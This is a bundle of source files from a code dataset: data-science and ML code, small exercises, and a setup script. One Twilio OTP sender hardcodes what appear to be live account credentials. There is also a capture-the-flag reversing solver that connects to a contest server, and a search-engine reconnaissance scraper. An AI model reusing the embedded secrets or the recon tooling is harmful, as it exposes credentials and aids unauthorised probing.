1:\n return str(base64.b64encode(hashlib.sha256(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha256(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha1(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha1(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha1(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha224(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha224(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha224(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha512(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha512(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha512(bytes(value, encoding='utf-8')).hexdigest()\n\n def __compute_sha384(self, value):\n if self.base64 == 1:\n return str(base64.b64encode(hashlib.sha384(bytes(value, encoding='utf-8')).digest()), \"utf-8\")\n else:\n return hashlib.sha384(bytes(value, encoding='utf-8')).hexdigest()\n\n def compute(self, value, pre_salt=None, postfit_salt=None):\n if not Encode.is_support(self.method):\n LOGGER.warning(\"Encode module do not support method:{}\".format(self.method))\n return value\n\n if pre_salt is not None:\n value = pre_salt + value\n\n if postfit_salt is not None:\n value = value + postfit_salt\n return self.dist_encode_function[self.method](value)\n","repo_name":"FederatedAI/FATE","sub_path":"python/federatedml/secureprotol/encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":5296,"dataset":"github-code","pt":"53"} +{"seq_id":"40845563947","text":"import numpy as np\nimport warnings\nfrom scipy import stats\nfrom six import string_types\nimport matplotlib.pyplot as plt\nfrom scipy.integrate import trapz\n\nfrom explore.utils import Proportions\n\n\ntry:\n import statsmodels.nonparametric.api as smnp\n _has_statsmodels = True\nexcept ImportError:\n _has_statsmodels = False\n\n\ndef _univariate_kde(data, shade=False, vertical=False, kernel='gau',\n bw=\"scott\", gridsize=100, cut=3,\n clip=None, legend=True, ax=None, cumulative=False,\n **kwargs):\n \"\"\"\n Computes the KDE of univariate data.\n\n shade : bool, optional\n If True, shade in the area under the KDE curve (or 
draw with filled\n contours when data is bivariate).\n vertical : bool, optional\n If True, density is on x-axis.\n kernel : {'gau' | 'cos' | 'biw' | 'epa' | 'tri' | 'triw' }, optional\n Code for shape of kernel to fit with. Bivariate KDE can only use\n gaussian kernel.\n bw : {'scott' | 'silverman' | scalar | pair of scalars }, optional\n Name of reference method to determine kernel size, scalar factor,\n or scalar for each dimension of the bivariate plot. Note that the\n underlying computational libraries have different interperetations\n for this parameter: ``statsmodels`` uses it directly, but ``scipy``\n treats it as a scaling factor for the standard deviation of the\n data.\n gridsize : int, optional\n Number of discrete points in the evaluation grid.\n cut : scalar, optional\n Draw the estimate to cut * bw from the extreme data points.\n clip : pair of scalars, or pair of pair of scalars, optional\n Lower and upper bounds for datapoints used to fit KDE. Can provide\n a pair of (low, high) bounds for bivariate plots.\n legend : bool, optional\n If True, add a legend or label the axes when possible.\n cumulative : bool, optional\n If True, draw the cumulative distribution estimated by the kde.\n\n ax : matplotlib axes, optional\n Axes to plot on, otherwise uses current axes.\n kwargs : key, value pairings\n Other keyword arguments are passed to ``plt.plot()`` or\n ``plt.contour{f}`` depending on whether a univariate or bivariate\n plot is being drawn.\n\n Output\n ------\n x: array-like, (n_grid_points, )\n The grid of values where the kde is evaluated.\n\n y: array-like, (n_grid_points, )\n The values of the KDE.\n \"\"\"\n\n # Sort out the clipping\n if clip is None:\n clip = (-np.inf, np.inf)\n\n # Calculate the KDE\n\n if np.nan_to_num(data.var()) == 0:\n # Don't try to compute KDE on singular data\n msg = \"Data must have variance to compute a kernel density estimate.\"\n warnings.warn(msg, UserWarning)\n x, y = np.array([]), np.array([])\n\n elif _has_statsmodels:\n # Prefer using statsmodels for kernel flexibility\n x, y = _statsmodels_univariate_kde(data, kernel, bw,\n gridsize, cut, clip,\n cumulative=cumulative)\n else:\n # Fall back to scipy if missing statsmodels\n if kernel != \"gau\":\n kernel = \"gau\"\n msg = \"Kernel other than `gau` requires statsmodels.\"\n warnings.warn(msg, UserWarning)\n if cumulative:\n raise ImportError(\"Cumulative distributions are currently \"\n \"only implemented in statsmodels. 
\"\n \"Please install statsmodels.\")\n x, y = _scipy_univariate_kde(data, bw, gridsize, cut, clip)\n\n # Make sure the density is nonnegative\n y = np.amax(np.c_[np.zeros_like(y), y], axis=1)\n\n return x, y\n\n\ndef _statsmodels_univariate_kde(data, kernel, bw, gridsize, cut, clip,\n cumulative=False):\n \"\"\"Compute a univariate kernel density estimate using statsmodels.\"\"\"\n fft = kernel == \"gau\"\n kde = smnp.KDEUnivariate(data)\n kde.fit(kernel, bw, fft, gridsize=gridsize, cut=cut, clip=clip)\n if cumulative:\n grid, y = kde.support, kde.cdf\n else:\n grid, y = kde.support, kde.density\n return grid, y\n\n\ndef _scipy_univariate_kde(data, bw, gridsize, cut, clip):\n \"\"\"Compute a univariate kernel density estimate using scipy.\"\"\"\n try:\n kde = stats.gaussian_kde(data, bw_method=bw)\n except TypeError:\n kde = stats.gaussian_kde(data)\n if bw != \"scott\": # scipy default\n msg = (\"Ignoring bandwidth choice, \"\n \"please upgrade scipy to use a different bandwidth.\")\n warnings.warn(msg, UserWarning)\n if isinstance(bw, string_types):\n bw = \"scotts\" if bw == \"scott\" else bw\n bw = getattr(kde, \"%s_factor\" % bw)() * np.std(data)\n grid = _kde_support(data, bw, gridsize, cut, clip)\n y = kde(grid)\n return grid, y\n\n\ndef _kde_support(data, bw, gridsize='default', cut=3, clip=None):\n \"\"\"Establish support for a kernel density estimate.\"\"\"\n support_min = max(data.min() - bw * cut, clip[0])\n support_max = min(data.max() + bw * cut, clip[1])\n return np.linspace(support_min, support_max, gridsize)\n\n\ndef get_class_kdes(values, classes, ensure_norm=True, **kde_kws):\n \"\"\"\n KDEs for values with associated classes. Computes the KDE of each class\n then weights each KDE by the number of points in each class. Also\n compute the overall KDE.\n\n Output\n ------\n cl_kdes, overall_kde\n\n cl_kdes: dict\n KDE for each class. Keys are class labels.\n\n overall_kde: dict\n Overall KDE (i.e. 
ignoring class labels)\n \"\"\"\n\n # TODO: do we really need ensure_norm\n\n overall_grid, overall_y = _univariate_kde(values, **kde_kws)\n if ensure_norm:\n overall_y = norm_kde(grid=overall_grid, y=overall_y)\n overall_kde = {'grid': overall_grid, 'y': overall_y}\n\n cl_props = Proportions(classes)\n cl_kdes = {}\n for cl in np.unique(classes):\n cl_mask = classes == cl\n cl_values = values[cl_mask]\n\n cl_grid, cl_y = _univariate_kde(cl_values, **kde_kws)\n\n if ensure_norm:\n cl_y = norm_kde(grid=cl_grid, y=cl_y)\n\n # weight area under KDE by number of samples\n cl_y *= cl_props[cl]\n cl_kdes[cl] = {'grid': cl_grid,\n 'y': cl_y}\n\n return cl_kdes, overall_kde\n\n\ndef norm_kde(grid, y):\n tot = trapz(y=y, x=grid)\n return y / tot\n\n\ndef _univariate_kdeplot(x, y, shade=True, vertical=False,\n legend=True, ax=None, **kwargs):\n \"\"\"Plot a univariate kernel density estimate on one of the axes.\"\"\"\n\n if ax is None:\n ax = plt.gca()\n\n # Make sure the density is nonnegative\n y = np.amax(np.c_[np.zeros_like(y), y], axis=1)\n\n # Flip the data if the plot should be on the y axis\n if vertical:\n x, y = y, x\n\n # Check if a label was specified in the call\n label = kwargs.pop(\"label\", None)\n\n # Otherwise check if the data object has a name\n if label is None and hasattr(x, \"name\"):\n label = x.name\n\n # Decide if we're going to add a legend\n legend = label is not None and legend\n label = \"_nolegend_\" if label is None else label\n\n # Use the active color cycle to find the plot color\n facecolor = kwargs.pop(\"facecolor\", None)\n line, = ax.plot(x, y, **kwargs)\n color = line.get_color()\n line.remove()\n kwargs.pop(\"color\", None)\n facecolor = color if facecolor is None else facecolor\n\n # Draw the KDE plot and, optionally, shade\n ax.plot(x, y, color=color, label=label, **kwargs)\n shade_kws = dict(\n facecolor=facecolor,\n alpha=kwargs.get(\"alpha\", 0.25),\n clip_on=kwargs.get(\"clip_on\", True),\n zorder=kwargs.get(\"zorder\", 1),\n )\n if shade:\n if vertical:\n ax.fill_betweenx(y, 0, x, **shade_kws)\n else:\n ax.fill_between(x, 0, y, **shade_kws)\n\n # Set the density axis minimum to 0\n if vertical:\n ax.set_xlim(0, auto=None)\n else:\n ax.set_ylim(0, auto=None)\n\n # Draw the legend here\n handles, labels = ax.get_legend_handles_labels()\n if legend and handles:\n ax.legend(loc=\"best\")\n\n return ax\n\n\ndef _univariate_conditional_kdeplot(values, classes,\n cl_labels=None,\n cl_palette=None,\n include_overall=True,\n shade=True,\n vertical=False,\n legend=True,\n ax=None,\n kde_kws={},\n kde_plt_kws={}):\n\n cl_kdes, overall_kde = get_class_kdes(values, classes, **kde_kws)\n\n # in case 'overall' is one of the classes\n if 'overall' in np.unique(classes):\n overall_name = ''.join(np.unique(classes))\n else:\n overall_name = 'overall'\n cl_kdes[overall_name] = overall_kde\n\n # plot the KDE for each class\n for cl in cl_kdes.keys():\n _kwargs = kde_plt_kws.copy()\n _kwargs['shade'] = shade\n\n x = cl_kdes[cl]['grid']\n y = cl_kdes[cl]['y']\n\n if cl_palette is not None and cl in cl_palette:\n _kwargs['color'] = cl_palette[cl]\n\n if cl_labels is not None and cl in cl_labels:\n _kwargs['label'] = cl_labels[cl]\n else:\n _kwargs['label'] = cl\n\n if cl == overall_name:\n if not include_overall:\n continue\n\n _kwargs['ls'] = '--'\n\n # _kwargs['alpha'] = .2\n _kwargs['zorder'] = 1\n _kwargs['label'] = None # 'overall'\n _kwargs['color'] = 'gray'\n _kwargs['shade'] = False\n\n _univariate_kdeplot(x=x, y=y,\n vertical=vertical,\n legend=legend, ax=ax, 
**_kwargs)\n","repo_name":"idc9/explore","sub_path":"explore/viz/kde.py","file_name":"kde.py","file_ext":"py","file_size_in_byte":9963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15441989321","text":"num = int(input())\ncoins = list(map(int, input().split()))\nmemo = []\nfinal_memo = []\ndef combinations(arr, n): \n result =[] \n if n == 0: \n return [[]] \n \n for i in range(0, len(arr)): \n elem = arr[i] \n rest_arr = arr[i + 1:] \n for C in combinations(rest_arr, n-1): \n result.append([elem]+C) \n \n return result\n\nfor i in range(num):\n memo.append(combinations(coins, i+1))\n\nfor i in range(num):\n for j in range(len(memo[i])):\n sum_elem = sum(memo[i][j])\n final_memo.append(sum_elem)\n\nprint(memo)\nprint(final_memo)\n\n\nfor i in range(1,100000):\n if i not in final_memo:\n print(i)\n break\n\n\n\n ","repo_name":"elice-python-coding/jyp","sub_path":"11-4.py","file_name":"11-4.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17989755569","text":"import librosa.display\r\nimport librosa\r\n\r\n''' script extracting song chromagram '''\r\ndef extract_chromogram(path):\r\n signal, sample_rate = librosa.load(path)\r\n chromogram = librosa.feature.chroma_stft(signal,\r\n # n_fft=frame_size,\r\n # hop_length=hop_length,\r\n sr=sample_rate)\r\n return chromogram\r\n","repo_name":"alexandrova-s/Mash-up-Generator","sub_path":"chromagram.py","file_name":"chromagram.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35505962256","text":"from pandas import read_csv\nfrom os import system\nimport argparse\n\n\ndef like_entropy(group, c_features):\n if len(group) == 0:\n return []\n max_many = 0\n feature = []\n for f in c_features:\n have = group[group[f] == 1]\n no_have = []#group[group[f] == 0]\n x = max(len(no_have), len(have))\n if x > max_many:\n max_many = x\n feature = [f]\n elif x == max_many:\n feature += [f]\n return feature\n\n \ndef divide_conquer(group, c_features, tree, ancestor_count):\n dividing_feature = like_entropy(group, c_features)\n if dividing_feature == []:\n if len(list(group['Especie'])) == 1:\n return list(group['Especie'])[0], tree, ancestor_count\n else:\n return list(group['Especie']), tree, ancestor_count\n f = dividing_feature[0]\n group1 = group[group[f] == 1]\n group2 = group[group[f] == 0]\n \n last_features = list(c_features)\n last_features.remove(f)\n\n if 0 in [len(group1), len(group2)]:\n if len(group1) == 0:\n ancestor, tree, ancestor_count = divide_conquer(group2, last_features, tree, ancestor_count)\n else:\n ancestor, tree, ancestor_count = divide_conquer(group1, last_features, tree, ancestor_count)\n ancestor_count += 1\n ancestor_name = 'ancestor_{}'.format(ancestor_count)\n tree[ancestor_name] = [ancestor, f]\n else:\n # ca = common ancestor\n if len(group1) == 1:\n ca1 = list(group1['Especie'])[0]\n else:\n ca1, tree, ancestor_count = divide_conquer(group1, last_features, tree, ancestor_count)\n if len(group2) == 1:\n ca2 = list(group2['Especie'])[0]\n else:\n ca2, tree, ancestor_count = divide_conquer(group2, last_features, tree, ancestor_count)\n\n ancestor_count += 1\n ancestor_name = 'ancestor_{}'.format(ancestor_count)\n tree[ancestor_name] = [ca1, ca2, f]\n return ancestor_name, tree, ancestor_count\n\n\ndef build_graphviz(node, tree):\n try:\n soon, feature = 
tree[node][0], tree[node][-1]\n except Exception:\n return ''\n branch = build_graphviz(soon, tree)\n graphviz = branch + '\\t{} -> {} [label=\"{}\"]\\n'.format(node, soon, feature)\n other_soon = tree[node][1:-1]\n for soon in other_soon:\n branch = build_graphviz(soon, tree)\n graphviz += branch + '\\t{} -> {}\\n'.format(node, soon)\n return graphviz\n\nif __name__ == '__main__':\n # construct the argument parser and parse the arguments\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-i\", \"--csv\", required=True, help=\"Path to input CSV file\")\n ap.add_argument(\"-o\", \"--out\", default='out', help=\"Name to output file\")\n args = vars(ap.parse_args())\n input_filename = args['csv']\n output_filename = args['out']\n \n tree = {}\n ancestor_count = 0\n group = read_csv(input_filename)\n c_features = list(group)[1:]\n root, tree, ancestor_count = divide_conquer(group, c_features, tree, ancestor_count)\n\n graphviz = 'digraph FileGenetica {\\n'\n tree_graph = build_graphviz(root, tree)\n graphviz += tree_graph + '}'\n \n file = open(output_filename + '.dot', 'w')\n file.write(graphviz)\n file.close()\n \n try:\n system('dot -Tpdf {0}.dot -o {0}.pdf'.format(output_filename))\n print('Out to PDF')\n except Exception:\n print(graphviz)\n ","repo_name":"geans/academico","sub_path":"InteligenciaArtificial2/ab1/ponto_extra/busca_em_grafo/arvore_filogenetica.py","file_name":"arvore_filogenetica.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21781950831","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\nclass InformationGathering:\n def __init__(self, target_url):\n self.url = target_url\n self.search_engine()\n\n def search_engine(self):\n search_engine = ['http://www.google.com/search', 'http://www.bing.com/search']\n title_google = []\n title_bing = []\n\n for url in search_engine:\n for x in range(0, 2):\n if url == 'http://www.google.com/search':\n params = {'q': \"site:\" + self.url,\n 'start': str(x * 10)}\n html = requests.get(url, params=params)\n soup = BeautifulSoup(html.content, 'html.parser')\n tmp = soup.find_all('h3')\n for y in range(0, len(tmp)):\n title_google.append(tmp[y].find('a').text)\n\n elif url == 'http://www.bing.com/search':\n params = {'q': \"site:\" + self.url,\n 'start': str(x * 10)}\n html = requests.get(url, params=params)\n soup = BeautifulSoup(html.content, 'html.parser')\n tmp = soup.find_all('h2')\n for y in range(0, len(tmp)):\n title_bing.append(tmp[y].find('a').text)\n\n print(\"Google\" + str(title_google))\n print(\"Bing\" + str(title_bing))\n\nif __name__ == \"__main__\":\n IG = InformationGathering(\"jbnu.ac.kr\")","repo_name":"true13/IS-OTGv4","sub_path":"InformationGathering/InformationGathering.py","file_name":"InformationGathering.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6359519094","text":"import tensorflow as tf\nfrom tensorflow.keras import (\n models,\n metrics,\n losses,\n)\n\nclass DCGAN(models.Model):\n def __init__(self, discriminator, generator, latent_dim, noise):\n super(DCGAN, self).__init__()\n self.discriminator = discriminator\n self.generator = generator\n self.latent_dim = latent_dim\n self.noise = noise\n\n def compile(self, d_optimizer, g_optimizer):\n super(DCGAN, self).compile()\n self.loss_fn = losses.BinaryCrossentropy()\n self.d_optimizer = d_optimizer\n self.g_optimizer = g_optimizer\n 
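# Added note (editorial): the trackers below are surfaced through the 'metrics'\n        # property, so Keras resets them at every epoch boundary; the label noise built\n        # in train_step feeds only the discriminator loss, while the accuracy trackers\n        # and the generator loss use the clean labels.\n        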
self.d_loss_metric = metrics.Mean(name=\"d_loss\")\n self.d_real_acc_metric = metrics.BinaryAccuracy(name=\"d_real_acc\")\n self.d_fake_acc_metric = metrics.BinaryAccuracy(name=\"d_fake_acc\")\n self.d_acc_metric = metrics.BinaryAccuracy(name=\"d_acc\")\n self.g_loss_metric = metrics.Mean(name=\"g_loss\")\n self.g_acc_metric = metrics.BinaryAccuracy(name=\"g_acc\")\n\n @property\n def metrics(self):\n return [\n self.d_loss_metric,\n self.d_real_acc_metric,\n self.d_fake_acc_metric,\n self.d_acc_metric,\n self.g_loss_metric,\n self.g_acc_metric,\n ]\n\n def train_step(self, real_images):\n # Sample random points in the latent space\n batch_size = tf.shape(real_images)[0]\n random_latent_vectors = tf.random.normal(\n shape=(batch_size, self.latent_dim)\n )\n\n # Train the discriminator on fake images\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = self.generator(\n random_latent_vectors, training=True\n )\n real_predictions = self.discriminator(real_images, training=True)\n fake_predictions = self.discriminator(\n generated_images, training=True\n )\n\n real_labels = tf.ones_like(real_predictions)\n real_noisy_labels = real_labels + self.noise * tf.random.uniform(\n tf.shape(real_predictions)\n )\n fake_labels = tf.zeros_like(fake_predictions)\n fake_noisy_labels = fake_labels - self.noise * tf.random.uniform(\n tf.shape(fake_predictions)\n )\n\n d_real_loss = self.loss_fn(real_noisy_labels, real_predictions)\n d_fake_loss = self.loss_fn(fake_noisy_labels, fake_predictions)\n d_loss = (d_real_loss + d_fake_loss) / 2.0\n\n g_loss = self.loss_fn(real_labels, fake_predictions)\n\n gradients_of_discriminator = disc_tape.gradient(\n d_loss, self.discriminator.trainable_variables\n )\n gradients_of_generator = gen_tape.gradient(\n g_loss, self.generator.trainable_variables\n )\n\n self.d_optimizer.apply_gradients(\n zip(gradients_of_discriminator, self.discriminator.trainable_variables)\n )\n self.g_optimizer.apply_gradients(\n zip(gradients_of_generator, self.generator.trainable_variables)\n )\n\n # Update metrics\n self.d_loss_metric.update_state(d_loss)\n self.d_real_acc_metric.update_state(real_labels, real_predictions)\n self.d_fake_acc_metric.update_state(fake_labels, fake_predictions)\n self.d_acc_metric.update_state(\n [real_labels, fake_labels], [real_predictions, fake_predictions]\n )\n self.g_loss_metric.update_state(g_loss)\n self.g_acc_metric.update_state(real_labels, fake_predictions)\n\n return {m.name: m.result() for m in self.metrics}","repo_name":"Pappa/MiroBot","sub_path":"notebooks/classes/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":3616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33530544660","text":"from twilio.rest import Client\nimport random\n\ndef optSender(mob):\n # Your Account Sid and Auth Token from twilio.com/console\n # and set the environment variables. 
See http://twil.io/secure\n    # NOTE (edit): live Twilio credentials were hardcoded here and have been redacted;\n    # per the comment above, load them from environment variables instead.\n    account_sid = 'REDACTED_ACCOUNT_SID'\n    auth_token = 'REDACTED_AUTH_TOKEN'\n    client = Client(account_sid, auth_token)\n\n    OtpNo = random.randint(1000,9999)\n    MonNo = \"+91\"+mob\n    data = {\n        \"OTP_NO\" : OtpNo,\n        \"MobNo\" : mob,\n        \"Msz\" : \"Your OTP in for Mob no verification is\"+str(OtpNo)\n    }\n\n    message = client.messages \\\n        .create(\n             body=\"Your OTP in for Mob no verification is\"+str(OtpNo),\n             from_='+12159874586',\n             to= MonNo\n        )\n    \n    return data","repo_name":"DDharma/novasie-plasma-connect","sub_path":"modules/OtpSend.py","file_name":"OtpSend.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34298808617","text":"from setuptools import setup\nfrom pathlib import Path\nfrom resoup import __version__, __description__, __url__, __author__, __raw_source_url__, __author_email__, __title__\n\nlong_description = f'이 설명은 최신 버전이 아닐 수 있습니다. 만약 최신 버전을 확인하고 싶으시다면 [이 깃허브 링크]({__url__})를 참고하세요.\\n'\nlong_description += Path('README.md').read_text(encoding='utf-8')\n\n\n# def repl_script(match: re.Match) -> str:\n#     if match.group('directory_type') == 'images':\n#         return rf'[{match.group(\"description\")}]({__raw_source_url__}/{match.group(\"path\")})'\n\n#     return rf'[{match.group(\"description\")}]({__raw_source_url__}/{match.group(\"path\")})'\n\n\n# long_description = re.sub(r'[[](?P<description>.*?)[]][(](..\\/)*(?P<path>(?P<directory_type>images|docs).*?)[)]',\n#                           repl_script, long_description)\n\n\nrequirements = [line for line in Path('requirements.txt').read_text(encoding='utf-8').splitlines()\n                if line and line[0] != '#']\n\nif __name__ == '__main__':\n    setup(\n        name=__title__,\n        version=__version__,\n        description=__description__,\n        author=__author__,\n        author_email=__author_email__,\n        long_description=long_description,\n        long_description_content_type='text/markdown',\n        license='MIT',\n        url=__url__,\n        install_requires=requirements,\n        packages=['resoup'],\n        keywords=['requests', 'bs4', 'BeautifulSoup', 'async', 'caching', 'cache'],\n        python_requires='>=3.10',\n        package_data={\n            # \"\": [\"*.pyi\", 'py.typed'],\n            \"\": [\"*.pyi\"],\n        },\n        zip_safe=False,\n        classifiers=[\n            \"License :: OSI Approved :: MIT License\",\n            \"Operating System :: OS Independent\",\n            'Programming Language :: Python :: 3.10',\n            'Programming Language :: Python :: 3.11',\n\n            # resoup specific\n            'Framework :: AsyncIO',\n            'Environment :: Web Environment',\n            'Intended Audience :: Developers',\n            'Topic :: Internet :: WWW/HTTP',\n        ],\n    )\n","repo_name":"ilotoki0804/requests-utils","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3154311461","text":"\"\"\"\n    Is Unique: Implement an algorithm to determine if a string\n    has all unique characters. 
What if you cannot use\n additional data structures?\n\"\"\"\n\ndef isUnique(word):\n\tfrom collections import Counter\n\n\tcount = Counter(word)\n\n\tfor i in count.values():\n\t\tif i > 1:\n\t\t\treturn False\n\n\treturn True\n\ndef isUnique2(word):\n\t##Use a hash map to check if there will be a repeat\n\tcheck = set()\n\n\tfor letter in word:\n\t\tif letter not in check:\n\t\t\tcheck.add(letter)\n\t\telse:\n\t\t\treturn False\n\treturn True\n\n\"\"\"\nTest Cases, master edit\n\"\"\"\n\nprint(isUnique('cat'))\nprint(isUnique('hat'))\nprint(isUnique('hello'))\nprint(isUnique('lkdklj23lkjdkfjd'))\nprint('\\n')\n\nprint(isUnique2('hat'))\nprint(isUnique2('cat'))\nprint(isUnique2('hello'))\nprint(isUnique2('lkdklj23lkjdkfjd'))\n","repo_name":"thtay/Algorithms_and_DataStructure","sub_path":"CrackingCodingInterview_Python/Arrays_and_Strings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6427073020","text":"\"\"\"\n\nnc tasks.aeroctf.com 44324\n'\\x76\\x72\\x23\\x25\\x18\\x23\\x73\\x26\\x74\\x27\\x18\\x77\\x20\\x26\\x73\\x23\\x77\\x25\\x77\\x73\\x18\\x27\\x25\\x20\\x20\\x74\\x21\\x76\\x27\\x23\\x75\\x23'\n\n\n\ndecoded = \"\".join([chr(((ord(x) + 8) ^ 0x17) - 7) for x in encoded])\n\"\"\"\n\nfrom pwn import *\n\np = remote(\"tasks.aeroctf.com\", 44324)\nfor i in range(1001):\n if (i == 0):\n tmp = p.recvline()\n target = tmp.split(b' ')[7][1:-2].decode(\"utf-8\")\n else:\n target = tmp.split(b' ')[8][1:-2].decode(\"utf-8\")\n #target = \"00ac8ed3b4327bdd4ebbebcb2ba10a00\"\n print(target)\n encoded = b\"\"\n operand = [0x0 for x in range(3)]\n with open(target, \"rb\") as f:\n content = f.read()\n encoded += content[0x12b2:0x12ba]\n encoded += content[0x12bc:0x12c4]\n encoded += content[0x12ce:0x12d6]\n encoded += content[0x12d8:0x12e0]\n operand[0] = content[0x1303]\n operand[1] = content[0x1306]\n operand[2] = (content[0x1309] ^ 0xff) + 1\n encoded = encoded.decode(\"ascii\")\n print(\"encoded: \" + encoded)\n decoded = \"\".join([chr(((ord(x) + operand[2]) ^ operand[1]) - operand[0]) for x in encoded])\n print(\"decoded: \" + decoded)\n token = decoded\n p.sendline(token)\n tmp = p.recvline()\n print(tmp)","repo_name":"r4k0nb4k0n/CTF-Writeups","sub_path":"2020/aeroctf_2020/reverse/1000_and_1_night/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"6317891302","text":"\"\"\" CNN for network augmentation \"\"\"\nimport torch\nimport torch.nn as nn\nimport genotypes as gt\nfrom sr_models.quant_conv_lsq import QAConv2d\nfrom sr_models.ADN import AdaptiveNormalization as ADN\nfrom sr_models.RFDN.block import ESA\nfrom .quant_ops import OPS\n\ndef summer(values, increments):\n return (v + i for v, i in zip(values, increments))\n\nSUPPORT_CONV_BIT = 8\n\nclass Residual(nn.Module):\n def __init__(self, skip, body, c_out, skip_mode=True):\n super().__init__()\n self.skip = skip\n self.cum_channels = OPS[\"simple_1x1\"]((c_out // 2) * (len(body)), c_out, [SUPPORT_CONV_BIT], None, 1, False, shared=False, quant_noise=False) \n self.body = body\n self.skip_mode = skip_mode\n self.adn = ADN(c_out, skip_mode=skip_mode)\n self.esa = ESA(c_out, [8], shared=False)\n\n def forward(self, x):\n def func(x):\n return self.esa(self.body_split(x))\n\n return self.adn(x, func, x) \n\n def body_split(self, x):\n splits = []\n for i in 
range(len(self.body)):\n if i < len(self.body) - 1:\n splits += [self.skip[i](x)]\n x = x + self.body[i](x)\n else:\n x = self.body[i](x) \n splits += [x]\n output = self.cum_channels(torch.cat(splits, dim=1))\n return output\n\n\nclass AugmentCNN(nn.Module):\n \"\"\"Searched CNN model for final training\"\"\"\n\n def __init__(\n self, c_in, c_fixed, scale, genotype, blocks=4, skip_mode=True\n ):\n\n \"\"\"\n Args:\n input_size: size of height and width (assuming height = width)\n C_in: # of input channels\n C: # of starting model channels\n \"\"\"\n super().__init__()\n self.skip_mode = skip_mode\n self.c_fixed = c_fixed\n # self.head = gt.to_dag_sr(\n # self.c_fixed, genotype.head, gene_type=\"head\", c_in=c_in\n # )\n\n self.body = nn.ModuleList()\n for i in range(blocks):\n b = gt.to_dag_sr(\n self.c_fixed, genotype.body[i], gene_type=\"body\", c_in=c_in\n )\n s = gt.to_dag_sr(\n self.c_fixed, genotype.skip[i], gene_type=\"skip\", c_in=c_in\n )\n assert len(genotype.skip[i]) == len(genotype.body[i]) - 1\n self.body.append(Residual(s, b, c_out=self.c_fixed, skip_mode=skip_mode))\n\n upsample = gt.to_dag_sr(\n self.c_fixed, genotype.upsample, gene_type=\"upsample\"\n )\n\n self.upsample = nn.Sequential(upsample, nn.PixelShuffle(scale))\n self.tail = gt.to_dag_sr(\n self.c_fixed, genotype.tail, gene_type=\"tail\", c_in=c_in\n )\n self.quant_mode = True\n\n self.adn_one = ADN(36, skip_mode=skip_mode)\n self.adn_two = ADN(3, skip_mode=skip_mode)\n self.c = OPS[\"simple_1x1\"](self.c_fixed * blocks, self.c_fixed, [SUPPORT_CONV_BIT], self.c_fixed, 1, False, shared=False, quant_noise=False)\n self.c2 = OPS[\"simple_3x3\"](self.c_fixed, self.c_fixed, [SUPPORT_CONV_BIT], self.c_fixed, 1, False, shared=False, quant_noise=False)\n\n def forward(self, x):\n\n x = x.repeat(1, self.c_fixed // 3, 1, 1)\n head_skip = x\n\n def func(x):\n concat_skips = []\n for cell in self.body:\n x = cell(x)\n concat_skips += [x]\n concat_skips = torch.cat(concat_skips, dim=1)\n x = self.c(concat_skips)\n return self.c2(x)\n\n x = self.upsample(func(x) + head_skip) \n return x + self.tail(x)\n\n def set_fp(self):\n if self.quant_mode == True:\n for m in self.modules():\n if isinstance(m, QAConv2d):\n m.set_fp()\n self.quant_mode = False\n\n def set_quant(self):\n if self.quant_mode == False:\n for m in self.modules():\n if isinstance(m, QAConv2d):\n m.set_quant()\n self.quant_mode = True\n\n def fetch_info(self):\n sum_flops = 0\n sum_memory = 0\n for m in self.modules():\n if isinstance(m, QAConv2d):\n b, m = m._fetch_info()\n sum_flops += b\n sum_memory = m\n return (sum_flops, sum_memory)\n","repo_name":"diff7/QuanToaster","sub_path":"sr_models/augment_cnn.py","file_name":"augment_cnn.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"28897579244","text":"# from __future__ import print_function\n#\n# import zmq\n# import time\n# from random import choice\n# from random import randrange\n# import zmq\n# from datetime import datetime\n# from matplotlib.dates import date2num\n#\n#\n# context = zmq.Context()\n# socket = context.socket(zmq.SUB)\n#\n# socket.connect(\"tcp://127.0.0.1:2027\")\n#\n# 